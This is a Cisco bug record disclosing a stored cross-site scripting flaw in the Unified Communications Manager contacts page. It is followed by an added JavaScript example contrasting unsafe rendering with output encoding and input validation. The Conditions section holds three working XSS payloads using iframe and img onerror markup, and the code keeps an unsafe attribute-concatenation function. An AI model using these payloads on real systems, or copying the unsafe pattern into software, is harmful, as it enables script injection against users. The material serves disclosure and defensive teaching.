Cisco Bug: CSCut30104 - XSS in contacts

Last Modified

Aug 06, 2018

Products (1)

  • Cisco Unified Communications Manager (CallManager)

Known Affected Releases

9.9(9.99002.1)

Description (partial)

Symptom:
The values entered into the phone contacts page are not properly validated. This may result in a cross-site scripting vulnerability on the contacts page.

Conditions:
+Create New Contact

Enter as follows:
Display Name:
s"><iframe></iframe><img src=x onerror=prompt(0);>e

First Name:
s"><iframe></iframe><img src=x onerror=prompt(1);>e

Last Name:
s"><iframe></iframe><img src=x onerror=prompt(2);>e

Save
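
The three values above each start with s"> to close a quoted attribute and its tag before adding markup. The following added example (not Cisco's code, and not taken from the bug record) renders those values with and without output encoding and checks them against an input policy; the function names, the input-element template and the name policy are assumptions made for illustration.

```javascript
// Added example: hypothetical rendering code, not the product's implementation.
// The three field values from the Conditions above, reused as test input.
const contact = {
  displayName: 's"><iframe></iframe><img src=x onerror=prompt(0);>e',
  firstName: 's"><iframe></iframe><img src=x onerror=prompt(1);>e',
  lastName: 's"><iframe></iframe><img src=x onerror=prompt(2);>e',
};

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored value is concatenated into a quoted attribute.
function renderFieldUnsafe(name, value) {
  return `<input type="text" name="${name}" value="${value}">`;
}

// Hardened pattern: every dynamic value is encoded at output time.
function renderFieldSafe(name, value) {
  return `<input type="text" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`;
}

// Assumed input policy: letters, marks, digits, space and . , ' - (1 to 64 chars).
const NAME_RE = /^[\p{L}\p{M}\p{N} .,'-]{1,64}$/u;
function isValidName(value) {
  return typeof value === 'string' && NAME_RE.test(value);
}

// Rough approximation of the tag openers an HTML parser would see in the markup.
function openedTags(html) {
  return Array.from(html.matchAll(/<([A-Za-z][A-Za-z0-9]*)/g), (m) => m[1].toLowerCase());
}

// For each field: would validation accept it, and which elements does each render create?
function audit(record) {
  return Object.entries(record).map(([field, value]) => ({
    field,
    accepted: isValidName(value),
    unsafeTags: openedTags(renderFieldUnsafe(field, value)),
    safeTags: openedTags(renderFieldSafe(field, value)),
  }));
}

for (const row of audit(contact)) console.log(JSON.stringify(row));
```

Validation on save and encoding on output are complementary: the policy rejects these values at entry, and the encoder keeps any value already stored from being parsed as markup.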